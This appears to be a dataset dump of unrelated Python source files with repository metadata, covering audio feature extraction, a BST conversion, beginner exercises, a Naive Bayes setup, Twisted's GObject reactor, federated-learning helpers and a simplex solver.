        filepath : directory to scan for audio files
        filename : file extension to load e.g. wav, flac....
        labels : label id (female: 0, male: 1)
    Returns :
        (data, lab) : dataset and label arrays reloaded from the saved files
    Raises :
        ValueError : if labels is neither 0 nor 1
    '''
    count = 1
    dataset = list()
    label = list()
    files = librosa.util.find_files(filepath, ext=[filename])
    files = np.asarray(files)
    for file in files:
        y, sr = librosa.load(file, sr=22050, duration=1.0)
        length = (len(y) / sr)
        # BUG FIX: only 1.0 s is loaded above, but the old guard skipped
        # everything shorter than 5.0 s — which was every clip, so the
        # dataset always came out empty. Match the guard to the loaded
        # duration, the same pattern load_data_mel uses (filter < duration).
        if length < 1.0:
            continue
        mels = librosa.feature.melspectrogram(y, sr=sr, n_fft=512, hop_length=128)
        mels = librosa.amplitude_to_db(mels, ref=np.max)
        dataset.append(mels)
        label.append(labels)
        print(str(count))
        count += 1
    # Resolve the output prefix once instead of duplicating save/load logic.
    if labels == 0:
        out_name = 'female_denoise'
    elif labels == 1:
        out_name = 'male_denoise'
    else:
        raise ValueError('labels must be 0 (female) or 1 (male)')
    out_dir = 'c:/nmb/nmb_data/npy/'
    np.save(out_dir + out_name + '_mel_data.npy', arr=dataset)
    np.save(out_dir + out_name + '_mel_label.npy', arr=label)
    data = np.load(out_dir + out_name + '_mel_data.npy')
    lab = np.load(out_dir + out_name + '_mel_label.npy')
    return data, lab
|
[
"sswwd95@gmail.com"
] |
sswwd95@gmail.com
|
6963934853735f22bd2b699b0ac88fcbc6d34969
|
387400d70932b7b65f0ad0e24cb8290a8ce6ed46
|
/August_18/google2018/109. Convert Sorted List to Binary Search Tree.py
|
c30387c4193b90ad3e1a2c0cb9827f9132a6a1a9
|
[] |
no_license
|
insigh/Leetcode
|
0678fc3074b6294e8369756900fff32c7ce4e311
|
29113d64155b152017fa0a98e6038323d1e8b8eb
|
refs/heads/master
| 2021-01-20T07:51:21.051366
| 2018-09-17T13:33:15
| 2018-09-17T13:33:15
| 90,051,425
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,499
|
py
|
"""
Given a singly linked list where elements are sorted in ascending order, convert it to a height balanced BST.
For this problem, a height-balanced binary tree is defined as a binary tree in which the depth of the two subtrees of every node never differ by more than 1.
Example:
Given the sorted linked list: [-10,-3,0,5,9],
One possible answer is: [0,-3,9,-10,null,5], which represents the following height balanced BST:
0
/ \
-3 9
/ /
-10 5
"""
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    def sortedListToBST(self, head):
        """
        Convert a sorted singly linked list into a height-balanced BST.

        :type head: ListNode
        :rtype: TreeNode
        """
        if not head:
            return None
        # Flatten the sorted list into an array so midpoints can be picked
        # in O(1) instead of re-walking the list for every subtree.
        nums = []
        while head:
            nums.append(head.val)
            head = head.next
        return self.constructBinaryTree(nums)

    def constructBinaryTree(self, nums):
        """Build a height-balanced BST from a sorted value list.

        The middle element becomes the root, so the two subtree sizes differ
        by at most one. (Removed the unused local `L` and the redundant
        single-element special case, which the general path already handles.)
        """
        if not nums:
            return None
        mid = len(nums) // 2
        node = TreeNode(nums[mid])
        node.left = self.constructBinaryTree(nums[:mid])
        node.right = self.constructBinaryTree(nums[mid + 1:])
        return node
|
[
"zhangchaojie@ruc.edu.cn"
] |
zhangchaojie@ruc.edu.cn
|
5462675544f12dbe29b1c868dd76aa611f90b43a
|
4fa832c70c3afbb55efc005b5c40167df52c18e0
|
/Python Crash Course/vAnil/Chapter-6/6-11.py
|
81c53c9b9e9abceea0d80ae3b98e44cf4b55529e
|
[] |
no_license
|
DimpleOrg/PythonRepository
|
76f87d21bfbbcc332f1b02956c4a0b48f084a97d
|
82ce549c7c08366a368d4e439e8ff4d66a4176ee
|
refs/heads/main
| 2023-06-09T21:54:28.330130
| 2021-05-06T13:00:48
| 2021-05-06T13:00:48
| 340,079,685
| 0
| 0
| null | 2021-07-01T12:41:39
| 2021-02-18T14:43:09
|
HTML
|
UTF-8
|
Python
| false
| false
| 680
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 6 17:04:37 2021

@author: ANIL

Exercise 6-11: nested dictionaries describing three cities, printed one
city per section with its details indented underneath.
"""

cities = {
    'delhi': {
        'country': 'India',
        'population': '2 crores',
        'fact': 'capital of India'
    },
    'lucknow': {
        'country': 'India',
        'population': '50 lakhs',
        'fact': 'capital of UP',
    },
    'mumbai': {
        'country': 'India',
        'population': '1 crore',
        'fact': 'city of Indian film industry.'
    },
}

# Walk the outer dict and each city's info dict in lockstep.
for city, info in cities.items():
    print(f'\nCity:\t\t\t{city.title()} \nInformations:')
    for attribute, detail in info.items():
        print(f'\t\t\t\t{attribute.title()}:\t{detail}')
    print('\n')
|
[
"anil.kumar4@hp.com"
] |
anil.kumar4@hp.com
|
7987a696a4686316125b988503e2541779de5618
|
18fff3ece39927a72a2977c5266f9371e94cf06a
|
/scripts/config/config.py
|
1d5c00d0f4c3569df3d3f12be432d2c265420eae
|
[
"MIT"
] |
permissive
|
luiscape/hdxscraper-ors
|
0d2699be4269921abbe87191eca0cc3108b61142
|
ec307625dcf266e448753d4de15b9a3d47c4026f
|
refs/heads/master
| 2021-01-25T03:48:34.096902
| 2015-06-22T21:26:02
| 2015-06-22T21:26:02
| 22,961,731
| 2
| 0
| null | 2015-05-20T19:56:27
| 2014-08-14T17:02:05
|
Python
|
UTF-8
|
Python
| false
| false
| 665
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import sys
dir = os.path.split(os.path.split(os.path.realpath(__file__))[0])[0]
sys.path.append(dir)
import json
from utilities.hdx_format import item
def LoadConfig(j='prod.json', verbose=True):
    '''Load configuration parameters from a JSON file.

    Returns the parsed dict, or False when the file is missing/invalid.
    (Python 2 module: note the statement-form prints below.)
    '''
    # Config files live in the `config` directory next to the package root.
    data_dir = os.path.join(os.path.split(dir)[0], 'config')
    try:
        j = os.path.join(data_dir, j)
        with open(j) as json_file:
            config = json.load(json_file)
    except Exception as e:
        # Best-effort load: report and signal failure with False rather
        # than propagating the exception to the caller.
        print "%s Couldn't load configuration." % item('prompt_error')
        if verbose:
            print e
        return False
    return config

if __name__ == "__main__":
    LoadConfig()
|
[
"luiscape@gmail.com"
] |
luiscape@gmail.com
|
ac30ba60a8ca7582effac94ead627f85ddf977c0
|
4eddf6a34715752dc652571b1ab274f51ceb5da0
|
/Bayes Classification/.history/Bayes_main_20210428162403.py
|
fe9dc422ef038bea4328c618c7e6c8136a840ae0
|
[] |
no_license
|
Suelt/Hust-SE-introduction-to-ML
|
649aba0e5b41363ceac03330ef02982982a0615d
|
a66785c3085da573f5748d13608eabf02e616321
|
refs/heads/master
| 2023-05-27T13:13:41.058545
| 2021-06-10T05:44:02
| 2021-06-10T05:44:02
| 375,582,438
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,156
|
py
|
"""Naive Bayes training statistics for the German credit dataset.

From a 70/30 train split this script estimates:
  * P(value | class) frequency tables for every categorical column
    (dict_main_true for 'good', dict_main_false for 'bad'), and
  * Gaussian (mean, sample std) parameters per class for the numeric
    columns 'duration', 'amount' and 'age' (dict_gaussian).
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn import model_selection

credit = pd.read_csv("C:\\pyproject\\Bayes Classification\\transformed.csv")
y = credit['credit_risk']
X = credit.loc[:, 'status':'foreign_worker']
X_train, X_test, y_train, y_test = model_selection.train_test_split(X, y, test_size=0.3, random_state=1)

cols = ['status', 'duration', 'credit_history', 'purpose', 'amount', 'savings', 'employment_duration', 'installment_rate', 'personal_status_sex', 'other_debtors',
        'present_residence', 'property', 'age', 'other_installment_plans', 'housing', 'number_credits', 'job', 'people_liable', 'telephone', 'foreign_worker']

# Restrict to the training rows, split by class label.
train = credit.loc[y_train.index]
train_good = train.loc[train['credit_risk'] == 'good']
length_good = train_good.shape[0]
train_bad = train.loc[train['credit_risk'] == 'bad']
length_bad = train_bad.shape[0]

# Conditional frequency tables, one inner dict per categorical column.
dict_main_true = {}
dict_main_false = {}
for col in cols:
    dict_main_true[col] = {}
    dict_main_false[col] = {}

# The three numeric columns are modelled with a Gaussian instead.
cols.remove('duration')
cols.remove('amount')
cols.remove('age')

for col in cols:
    dict_new_good = {}
    dict_new_bad = {}
    # Hoist the value_counts() Series out of the inner loop (it was
    # recomputed once per value) and use .get(value, 0) on the 'bad' side:
    # a value that appears only in the good rows used to raise KeyError.
    counts_good = train_good[col].value_counts()
    counts_bad = train_bad[col].value_counts()
    for value in counts_good.keys().tolist():
        dict_new_good[value] = counts_good[value] / length_good
        dict_new_bad[value] = counts_bad.get(value, 0) / length_bad
    dict_main_true[col] = dict_new_good
    dict_main_false[col] = dict_new_bad

# Gaussian parameters [mean, sample std] per class for the numeric columns.
dict_gaussian = {'duration': {}, 'amount': {}, 'age': {}}
for key in dict_gaussian:
    dict_new = {}
    list_good = train_good[key]
    dict_new['good'] = [np.mean(list_good), np.std(list_good, ddof=1)]
    list_bad = train_bad[key]
    dict_new['bad'] = [np.mean(list_bad), np.std(list_bad, ddof=1)]
    dict_gaussian[key] = dict_new

print(X_test, y_test)
y = y_test
print(y)
# print(dict_main_true)
# print(dict_main_false)
|
[
"2552925383@qq.com"
] |
2552925383@qq.com
|
e328b50030a57047e83da491475b3a082fcbf5c0
|
b9dc028b6a62d681ef02f149efc903a182edcf13
|
/week/6주차_선형재귀와 반복/6-4.1.py
|
461553338bed4291c6e206396a85073b33bca798
|
[] |
no_license
|
masiro97/Python
|
0d1963867c5e6fec678d8b9d07afa6aa055305ed
|
78ec468630110cdd850e5ecaab33e5cf5bde0395
|
refs/heads/master
| 2021-05-10T22:47:28.692417
| 2018-01-20T17:58:46
| 2018-01-20T17:58:46
| 118,267,178
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 161
|
py
|
def power(b, n):
    """Return b**n for n > 0 via exponentiation by squaring; 1 for n <= 0."""
    result = 1
    base = b
    remaining = n
    while remaining > 0:
        if remaining % 2:
            result *= base
        base **= 2
        remaining //= 2
    return result
|
[
"estrk7120@gmail.com"
] |
estrk7120@gmail.com
|
2db4950cce667880d8a89f0a16b27301c138bbad
|
31009efe0b3882551f03dcaa9c71756c7c6f6ede
|
/src/main/resources/twisted/internet/gireactor.py
|
a7ada11c7385128a3d2c2f55a02998df86151f47
|
[
"Apache-2.0",
"ZPL-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
riyafa/autobahntestsuite-maven-plugin
|
b533433c75f7daea2757158de54c6d80d304a962
|
737e6dad2d3ef794f30f0a2013a77e28decd2ec4
|
refs/heads/master
| 2020-08-16T13:31:39.349124
| 2019-10-16T09:20:55
| 2019-10-16T09:20:55
| 215,506,990
| 0
| 0
|
Apache-2.0
| 2019-10-16T09:18:34
| 2019-10-16T09:18:34
| null |
UTF-8
|
Python
| false
| false
| 6,123
|
py
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
This module provides support for Twisted to interact with the glib
mainloop via GObject Introspection.
In order to use this support, simply do the following::
from twisted.internet import gireactor
gireactor.install()
If you wish to use a GApplication, register it with the reactor::
from twisted.internet import reactor
reactor.registerGApplication(app)
Then use twisted.internet APIs as usual.
On Python 3, pygobject v3.4 or later is required.
"""
from __future__ import division, absolute_import
from twisted.python.compat import _PY3
from twisted.internet.error import ReactorAlreadyRunning
from twisted.internet import _glibbase
from twisted.python import runtime
if _PY3:
    # We require a sufficiently new version of pygobject, so always exists:
    _pygtkcompatPresent = True
else:
    # We can't just try to import gi.pygtkcompat, because that would import
    # gi, and the goal here is to not import gi in cases where that would
    # cause segfault.
    from twisted.python.modules import theSystemPath
    _pygtkcompatPresent = True
    try:
        # Probe the import path only — this never executes gi code.
        theSystemPath["gi.pygtkcompat"]
    except KeyError:
        _pygtkcompatPresent = False


# Modules that we want to ensure aren't imported if we're on older versions of
# GI:
_PYGTK_MODULES = ['gobject', 'glib', 'gio', 'gtk']
def _oldGiInit():
    """
    Make sure pygtk and gi aren't loaded at the same time, and import Glib if
    possible.
    """
    # We can't immediately prevent imports, because that confuses some buggy
    # code in gi:
    _glibbase.ensureNotImported(
        _PYGTK_MODULES,
        "Introspected and static glib/gtk bindings must not be mixed; can't "
        "import gireactor since pygtk2 module is already imported.")

    global GLib
    from gi.repository import GLib
    if getattr(GLib, "threads_init", None) is not None:
        # Only needed by older GLib; newer releases are thread-aware already.
        GLib.threads_init()

    # From here on, actively refuse imports of the static pygtk bindings.
    _glibbase.ensureNotImported([], "",
                                preventImports=_PYGTK_MODULES)
if not _pygtkcompatPresent:
    # Older versions of gi don't have compatability layer, so just enforce no
    # imports of pygtk and gi at same time:
    _oldGiInit()
else:
    # Newer version of gi, so we can try to initialize compatibility layer; if
    # real pygtk was already imported we'll get ImportError at this point
    # rather than segfault, so unconditional import is fine.
    import gi.pygtkcompat
    gi.pygtkcompat.enable()
    # At this point importing gobject will get you gi version, and importing
    # e.g. gtk will either fail in non-segfaulty way or use gi version if user
    # does gi.pygtkcompat.enable_gtk(). So, no need to prevent imports of
    # old school pygtk modules.
    from gi.repository import GLib
    if getattr(GLib, "threads_init", None) is not None:
        # No-op on modern GLib, required on older releases.
        GLib.threads_init()
class GIReactor(_glibbase.GlibReactorBase):
    """
    GObject-introspection event loop reactor.

    @ivar _gapplication: A C{Gio.Application} instance that was registered
        with C{registerGApplication}.
    """
    # Poll condition masks expressed as GLib IOCondition flags; evaluated at
    # class-body time, so GLib must already be imported above.
    _POLL_DISCONNECTED = (GLib.IOCondition.HUP | GLib.IOCondition.ERR |
                          GLib.IOCondition.NVAL)
    _POLL_IN = GLib.IOCondition.IN
    _POLL_OUT = GLib.IOCondition.OUT

    # glib's iochannel sources won't tell us about any events that we haven't
    # asked for, even if those events aren't sensible inputs to the poll()
    # call.
    INFLAGS = _POLL_IN | _POLL_DISCONNECTED
    OUTFLAGS = _POLL_OUT | _POLL_DISCONNECTED

    # By default no Application is registered:
    _gapplication = None

    def __init__(self, useGtk=False):
        _gtk = None
        if useGtk is True:
            from gi.repository import Gtk as _gtk

        _glibbase.GlibReactorBase.__init__(self, GLib, _gtk, useGtk=useGtk)

    def registerGApplication(self, app):
        """
        Register a C{Gio.Application} or C{Gtk.Application}, whose main loop
        will be used instead of the default one.

        We will C{hold} the application so it doesn't exit on its own. In
        versions of C{python-gi} 3.2 and later, we exit the event loop using
        the C{app.quit} method which overrides any holds. Older versions are
        not supported.
        """
        if self._gapplication is not None:
            raise RuntimeError(
                "Can't register more than one application instance.")
        if self._started:
            raise ReactorAlreadyRunning(
                "Can't register application after reactor was started.")
        if not hasattr(app, "quit"):
            raise RuntimeError("Application registration is not supported in"
                               " versions of PyGObject prior to 3.2.")

        self._gapplication = app

        def run():
            # Hold the app so it keeps the main loop alive until we quit it.
            app.hold()
            app.run(None)
        self._run = run

        # app.quit overrides any outstanding holds, so it doubles as _crash.
        self._crash = app.quit
class PortableGIReactor(_glibbase.PortableGlibReactorBase):
    """
    Portable GObject Introspection event loop reactor.
    """
    def __init__(self, useGtk=False):
        if useGtk is True:
            from gi.repository import Gtk as gtk_module
        else:
            gtk_module = None
        _glibbase.PortableGlibReactorBase.__init__(
            self, GLib, gtk_module, useGtk=useGtk)

    def registerGApplication(self, app):
        """
        Register a C{Gio.Application} or C{Gtk.Application}, whose main loop
        will be used instead of the default one.
        """
        raise NotImplementedError("GApplication is not currently supported on Windows.")
def install(useGtk=False):
    """
    Configure the twisted mainloop to be run inside the glib mainloop.

    @param useGtk: should GTK+ rather than glib event loop be
        used (this will be slightly slower but does support GUI).
    """
    # POSIX platforms get the native glib reactor; everything else the
    # portable fallback.
    reactor_class = (GIReactor if runtime.platform.getType() == 'posix'
                     else PortableGIReactor)
    reactor = reactor_class(useGtk=useGtk)
    from twisted.internet.main import installReactor
    installReactor(reactor)
    return reactor


__all__ = ['install']
|
[
"nmaurer@redhat.com"
] |
nmaurer@redhat.com
|
2cae4e3b0562f72541fbb29166ea5f6cf51778db
|
a336dcd58a1e425add4add54dd0640ce1829e2ba
|
/language_modeling/language_utils.py
|
45463ef7377097b692feb461e34052e71368e06c
|
[
"MIT"
] |
permissive
|
ylsung/FedMA
|
8d0b15bcecc98f87f8d1fe3283dadea38797fa3f
|
d80c22c0a464abcbc47346b9cbc0080a2556fa49
|
refs/heads/master
| 2022-04-12T20:31:53.064893
| 2020-04-03T15:33:27
| 2020-04-03T15:33:27
| 242,638,655
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,412
|
py
|
# Modified from: https://github.com/litian96/FedProx/blob/master/flearn/utils/language_utils.py
# credit goes to: Tian Li (litian96 @ GitHub)
"""Utils for language models."""
import re

import numpy as np
import torch
# ------------------------
# utils for shakespeare dataset
ALL_LETTERS = "\n !\"&'(),-.0123456789:;>?ABCDEFGHIJKLMNOPQRSTUVWXYZ[]abcdefghijklmnopqrstuvwxyz}"
NUM_LETTERS = len(ALL_LETTERS)
def _one_hot(index, size):
'''returns one-hot vector with given size and value 1 at given index
'''
vec = [0 for _ in range(size)]
vec[int(index)] = 1
return vec
def letter_to_vec(letter):
'''returns one-hot representation of given letter
'''
index = ALL_LETTERS.find(letter)
return _one_hot(index, NUM_LETTERS)
def word_to_indices(word):
'''returns a list of character indices
Args:
word: string
Return:
indices: int list with length len(word)
'''
indices = []
for c in word:
indices.append(ALL_LETTERS.find(c))
return indices
# ------------------------
# utils for sent140 dataset
def split_line(line):
'''split given line/phrase into list of words
Args:
line: string representing phrase to be split
Return:
list of strings, with each string representing a word
'''
return re.findall(r"[\w']+|[.,!?;]", line)
def _word_to_index(word, indd):
'''returns index of given word based on given lookup dictionary
returns the length of the lookup dictionary if word not found
Args:
word: string
indd: dictionary with string words as keys and int indices as values
'''
if word in indd:
return indd[word]
else:
return len(indd)
def line_to_indices(line, word2id, max_words=25):
'''converts given phrase into list of word indices
if the phrase has more than max_words words, returns a list containing
indices of the first max_words words
if the phrase has less than max_words words, repeatedly appends integer
representing unknown index to returned list until the list's length is
max_words
Args:
line: string representing phrase/sequence of words
word2id: dictionary with string words as keys and int indices as values
max_words: maximum number of word indices in returned list
Return:
indl: list of word indices, one index for each word in phrase
'''
unk_id = len(word2id)
line_list = split_line(line) # split phrase in words
indl = [word2id[w] if w in word2id else unk_id for w in line_list[:max_words]]
indl += [unk_id]*(max_words-len(indl))
return indl
def bag_of_words(line, vocab):
'''returns bag of words representation of given phrase using given vocab
Args:
line: string representing phrase to be parsed
vocab: dictionary with words as keys and indices as values
Return:
integer list
'''
bag = [0]*len(vocab)
words = split_line(line)
for w in words:
if w in vocab:
bag[vocab[w]] += 1
return bag
def repackage_hidden(h):
    """Detach hidden-state tensors (or nested tuples of them) from history."""
    if isinstance(h, torch.Tensor):
        return h.detach()
    return tuple(repackage_hidden(part) for part in h)
def process_x(raw_x_batch):
    """Encode each word as character indices; return a (seq, batch) array."""
    encoded = [word_to_indices(word) for word in raw_x_batch]
    return np.array(encoded).T
def process_y(raw_y_batch):
    """One-hot encode each character label into a 2-D numpy array."""
    return np.array([letter_to_vec(ch) for ch in raw_y_batch])
def patch_h_weights(weights, L_next, assignments):
    """Permute stacked hidden-to-hidden weights into (4*L_next, L_next).

    The rows of `weights` are 4 equal gate blocks stacked along axis 0
    (e.g. (1024, 256) from four (256, 256) blocks); each block is scattered
    independently to the positions given by `assignments`.
    """
    def _scatter(block):
        out = np.zeros((L_next, L_next), dtype=np.float32)
        out[np.ix_(assignments, assignments)] = block
        return out

    gate_rows = np.split(np.arange(weights.shape[0]), 4)
    return np.vstack([_scatter(weights[rows, :]) for rows in gate_rows])
def patch_biases(biases, L_next, assignments):
    """Scatter each of the 4 gate bias segments into a length-L_next slot."""
    def _scatter(segment):
        out = np.zeros(L_next)
        out[assignments] = segment
        return out

    return np.hstack([_scatter(seg) for seg in np.split(biases, 4)])
def perm_i_weights(w_j, L_next, assignment_j_c):
    """Scatter each of the 4 gate blocks of w_j into L_next output rows."""
    def _scatter(rows):
        out = np.zeros((L_next, w_j.shape[1]))
        out[assignment_j_c, :] = w_j[rows, :]
        return out

    gate_rows = np.split(np.arange(w_j.shape[0]), 4)
    return np.vstack([_scatter(rows) for rows in gate_rows])
def patch_i_weights(weights, L_next, assignments):
    """Permute the 4 stacked gate blocks, then hstack and transpose.

    Note the transpose: the result is the vertical stack of each permuted
    block's transpose, matching the original hstack(...).T layout.
    """
    def _scatter(block):
        out = np.zeros((L_next, L_next), dtype=np.float32)
        out[np.ix_(assignments, assignments)] = block
        return out

    gate_rows = np.split(np.arange(weights.shape[0]), 4)
    permuted = [_scatter(weights[rows, :]) for rows in gate_rows]
    return np.hstack(permuted).T
def patch_i_biases(biases, L_next, assignments):
    """Scatter the 4 gate bias segments (float32) into length-L_next slots."""
    def _scatter(segment):
        out = np.zeros(L_next, dtype=np.float32)
        out[assignments] = segment
        return out

    return np.hstack([_scatter(seg) for seg in np.split(biases, 4)])
# NOTE(review): exact duplicate of perm_i_weights defined earlier in this
# module; this second definition shadows the first with identical behavior.
# Consider deleting one of the two copies.
def perm_i_weights(w_j, L_next, assignment_j_c):
    # Split the stacked input-to-hidden weights into the 4 gate blocks.
    split_range = np.split(np.arange(w_j.shape[0]), 4)
    res = []
    for i in range(4):
        cand_w_j = w_j[split_range[i], :]
        # Scatter this block's rows to their assigned global positions.
        temp_new_w_j = np.zeros((L_next, w_j.shape[1]))
        temp_new_w_j[assignment_j_c, :] = cand_w_j
        res.append(temp_new_w_j)
    return np.vstack(res)
|
[
"hongyiwang@cs.wisc.edu"
] |
hongyiwang@cs.wisc.edu
|
32ac5a7d72b76f113a77fc4d6eca2a230f2d9f1a
|
bd6fd6bb82bf3179a4571c7a2ca3a030f5684c5c
|
/mundo3-EstruturasCompostas/096-funcaoQueCalculaArea.py
|
a37552e17727565abb68b53d43e8027d78f1f497
|
[
"MIT"
] |
permissive
|
jonasht/CursoEmVideo-CursoDePython3
|
b3e70cea1df9f33f409c4c680761abe5e7b9e739
|
a1bbf1fe4226b1828213742ee5a440278d903fd1
|
refs/heads/master
| 2023-08-27T12:12:38.103023
| 2021-10-29T19:05:01
| 2021-10-29T19:05:01
| 276,724,139
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 315
|
py
|
def calcularArea(largura, comprimento):
    """Return the area of a rectangular plot (largura x comprimento)."""
    return comprimento * largura
# Read the plot dimensions from the user, compute the area and report it.
print('=-'*30+'=')
largura = float(input('qual é a largura: '))
comprimento = float(input('qual é o comprimento: '))
resposta = calcularArea(largura, comprimento)
print(f'a area do terreno {largura}X{comprimento} é de {resposta}m²')
|
[
"jhenriquet@outlook.com.br"
] |
jhenriquet@outlook.com.br
|
a7be00b6b8cb3f71f680f3dd9f899fc55ee28faf
|
40b6aa99da5b96a382a04b818b558b66c47f5a96
|
/projects/serializers.py
|
070927afeb267f7413d593453aa2dd3a1c9d1dec
|
[
"BSD-3-Clause"
] |
permissive
|
LABETE/TestYourProject
|
8bba87004227005edf6b7e9cfb1b3e496441bc7b
|
416d5e7993343e42f031e48f4d78e5332d698519
|
refs/heads/master
| 2021-01-10T18:47:29.581371
| 2015-09-03T16:48:05
| 2015-09-03T16:48:05
| 37,154,071
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 437
|
py
|
from rest_framework import serializers
from .models import Project
class ProjectSerializer(serializers.ModelSerializer):
    """Serialize Project instances for the REST API (all listed fields)."""
    class Meta:
        model = Project
        # Fields displayed on the rest api for projects
        fields = (
            "id", "name", "owner", "description",
            "start_date", "end_date", "created", "modified",
            "co_owners", "status",)
|
[
"eddie.valv@gmail.com"
] |
eddie.valv@gmail.com
|
dc228204221f9999a303f9408c676717036ef6e4
|
54934cfe32ce5aa5c2e718b0c5c2afa4b458fe75
|
/29ch/simplex.py
|
59b4470baf756d0125074792e5d87eb8135a1b62
|
[] |
no_license
|
mccarvik/intro_to_algorithms
|
46d0ecd20cc93445e0073eb0041d481a29322e82
|
c2d41706150d2bb477220b6f929510c4fc4ba30b
|
refs/heads/master
| 2021-04-12T12:25:14.083434
| 2019-11-09T05:26:28
| 2019-11-09T05:26:28
| 94,552,252
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,014
|
py
|
"""Tabular simplex method for a small hard-coded maximization LPP.

Solves max c.x s.t. A.x = b (slack variables already included in A),
printing the tableau at every iteration and reporting unbounded /
alternate-optimum cases.
"""
import numpy as np
from fractions import Fraction  # so that numbers are not displayed in decimal.

print("\n ****SiMplex Algorithm ****\n\n")

# inputs
# A will contain the coefficients of the constraints
A = np.array([[1, 1, 0, 1], [2, 1, 1, 0]])
# b will contain the amount of resources
b = np.array([8, 10])
# c will contain coefficients of objective function Z
c = np.array([1, 1, 0, 0])

# B will contain the basic variables that make identity matrix
cb = np.array(c[3])
B = np.array([[3], [2]])
# cb contains their corresponding coefficients in Z
cb = np.vstack((cb, c[2]))
xb = np.transpose([b])
# combine matrices B and cb
table = np.hstack((B, cb))
table = np.hstack((table, xb))
# finally combine matrix A to form the complete simplex table
table = np.hstack((table, A))
# change the type of table to float
table = np.array(table, dtype='float')
# inputs end

# if min problem, make this var 1
MIN = 0

print("Table at itr = 0")
print("B \tCB \tXB \ty1 \ty2 \ty3 \ty4")
for row in table:
    for el in row:
        # limit the denominator under 100
        print(Fraction(str(el)).limit_denominator(100), end='\t')
    print()
print()

print("Simplex Working....")

# when optimality reached it will be made 1
reached = 0
itr = 1
unbounded = 0
alternate = 0

while reached == 0:
    print("Iteration: ", end=' ')
    print(itr)
    print("B \tCB \tXB \ty1 \ty2 \ty3 \ty4")
    for row in table:
        for el in row:
            print(Fraction(str(el)).limit_denominator(100), end='\t')
        print()

    # calculate Relative profits-> cj - zj for non-basics
    i = 0
    rel_prof = []
    while i < len(A[0]):
        rel_prof.append(c[i] - np.sum(table[:, 1] * table[:, 3 + i]))
        i = i + 1

    print("rel profit: ", end=" ")
    for profit in rel_prof:
        print(Fraction(str(profit)).limit_denominator(100), end=", ")
    print()

    i = 0
    b_var = table[:, 0]
    # a NON-basic column with zero relative profit means another optimal
    # vertex exists (alternate optimum)
    while i < len(A[0]):
        j = 0
        present = 0
        while j < len(b_var):
            if int(b_var[j]) == i:
                present = 1
                break
            j += 1
        if present == 0:
            if rel_prof[i] == 0:
                alternate = 1
                print("Case of Alternate found")
        i += 1
    print()

    flag = 0
    for profit in rel_prof:
        if profit > 0:
            flag = 1
            break
    # if all relative profits <= 0
    if flag == 0:
        print("All profits are <= 0, optimality reached")
        reached = 1
        break

    # kth var will enter the basis
    k = rel_prof.index(max(rel_prof))
    min = 99999
    i = 0
    r = -1
    # min ratio test (only positive values)
    while i < len(table):
        if (table[:, 2][i] > 0 and table[:, 3 + k][i] > 0):
            val = table[:, 2][i] / table[:, 3 + k][i]
            if val < min:
                min = val
                r = i  # leaving variable
        i += 1

    # if no min ratio test was performed
    if r == -1:
        unbounded = 1
        print("Case of Unbounded")
        break

    print("pivot element index:", end=' ')
    print(np.array([r, 3 + k]))

    pivot = table[r][3 + k]
    print("pivot element: ", end=" ")
    print(Fraction(pivot).limit_denominator(100))

    # divide the pivot row with the pivot element
    table[r, 2:len(table[0])] = table[r, 2:len(table[0])] / pivot

    # do row operation on other rows
    i = 0
    while i < len(table):
        if i != r:
            table[i, 2:len(table[0])] = table[i, 2:len(table[0])] - table[i][3 + k] * table[r, 2:len(table[0])]
        i += 1

    # assign the new basic variable
    table[r][0] = k
    # BUG FIX: the basic-variable cost column must hold the cost of the
    # ENTERING variable k, not c[r] (r is only the pivot-row index). The old
    # code was correct only when c[k] happened to equal c[r].
    table[r][1] = c[k]

    print()
    print()
    itr += 1

print()
print("***************************************************************")
if unbounded == 1:
    print("UNBOUNDED LPP")
    exit()
if alternate == 1:
    print("ALTERNATE Solution")

print("optimal table:")
print("B \tCB \tXB \ty1 \ty2 \ty3 \ty4")
for row in table:
    for el in row:
        print(Fraction(str(el)).limit_denominator(100), end='\t')
    print()
print()

print("value of Z at optimality: ", end=" ")
basis = []
i = 0
sum = 0
while i < len(table):
    sum += c[int(table[i][0])] * table[i][2]
    temp = "x" + str(int(table[i][0]) + 1)
    basis.append(temp)
    i += 1
# if MIN problem make z negative
if MIN == 1:
    print(-Fraction(str(sum)).limit_denominator(100))
else:
    print(Fraction(str(sum)).limit_denominator(100))
print("Final Basis: ", end=" ")
print(basis)

print("Simplex Finished...")
print()
|
[
"ec2-user@ip-172-31-91-31.ec2.internal"
] |
ec2-user@ip-172-31-91-31.ec2.internal
|
c16d82720ec1b8fe3e203367af944e196afff6e1
|
a829617f9ad158df80a569dd02a99c53639fa2c6
|
/test/hep/hist/plotscatter1.py
|
481bd4af3c75beb1b29ae31a8343f51318ba9f68
|
[] |
no_license
|
alexhsamuel/pyhep
|
6db5edd03522553c54c8745a0e7fe98d96d2b7ae
|
c685756e9065a230e2e84c311a1c89239c5d94de
|
refs/heads/master
| 2021-01-10T14:24:08.648081
| 2015-10-22T13:18:50
| 2015-10-22T13:18:50
| 44,745,881
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,188
|
py
|
#-----------------------------------------------------------------------
# imports
#-----------------------------------------------------------------------

from hep.draw import *
import hep.draw.postscript
import hep.draw.xwindow
import hep.hist
import hep.hist.plot
from random import random
import sys

#-----------------------------------------------------------------------
# tests
#-----------------------------------------------------------------------

# 2D scatter of (mass, momentum) samples: mass uniform on [0, 2), momentum
# a sum of four uniforms shifted to centre roughly on zero.
scatter = hep.hist.Scatter((float, "mass", "GeV/$c^2$"),
